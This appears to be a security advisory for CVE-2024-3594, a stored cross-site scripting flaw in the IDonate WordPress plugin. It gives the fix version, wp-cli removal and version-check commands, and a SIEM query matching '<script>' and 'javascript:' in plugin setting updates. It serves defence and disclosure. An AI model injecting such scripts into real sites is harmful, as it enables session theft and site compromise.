CVE-2024-3594
📋 TL;DR
The IDonate WordPress plugin through version 1.9.0 contains a stored cross-site scripting (XSS) vulnerability in its settings. This allows authenticated administrators to inject malicious scripts that execute when other users view affected pages, even in WordPress multisite configurations where unfiltered_html is restricted. The vulnerability affects WordPress sites using the IDonate plugin.
💻 Affected Systems
- IDonate WordPress Plugin
📦 What is this software?
Idonate by Themeatelier
⚠️ Risk & Real-World Impact
Worst Case
An attacker with admin privileges could inject malicious JavaScript that steals session cookies, redirects users to phishing sites, or performs actions on behalf of authenticated users, potentially leading to complete site compromise.
Likely Case
Malicious admin or compromised admin account injects scripts that affect other privileged users, potentially leading to privilege escalation or data theft.
If Mitigated
With proper access controls and admin account security, impact is limited to authorized administrators who would need to intentionally exploit their own site.
🎯 Exploit Status
Exploitation requires admin-level access to WordPress. The vulnerability is in plugin settings that should be sanitized but aren't.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.9.1 or later
Vendor Advisory: https://wpscan.com/vulnerability/7a8a834a-e5d7-4678-9d35-4390d1200437/
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find IDonate plugin and click 'Update Now' if available. 4. Alternatively, download latest version from WordPress repository and replace plugin files.
🔧 Temporary Workarounds
Remove IDonate Plugin
linuxTemporarily disable or remove the vulnerable plugin until patched
wp plugin deactivate idonate
wp plugin delete idonate
Restrict Admin Access
allImplement strict access controls and monitoring for admin accounts
🧯 If You Can't Patch
- Implement strict access controls for WordPress admin accounts and enable multi-factor authentication
- Deploy web application firewall (WAF) rules to detect and block XSS payloads in plugin settings
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin panel → Plugins → Installed Plugins, find IDonate plugin and verify version is 1.9.0 or earlierCheck Version:
wp plugin get idonate --field=versionVerify Fix Applied:
Verify IDonate plugin version is 1.9.1 or later in WordPress admin panel📡 Detection & Monitoring
Log Indicators:
- Unusual admin activity modifying plugin settings
- JavaScript payloads in plugin setting updates
Network Indicators:
- Requests to plugin settings endpoints with script tags or JavaScript payloads
SIEM Query:
source="wordpress" AND (event="plugin_settings_update" OR event="option_update") AND (data CONTAINS "<script>" OR data CONTAINS "javascript:")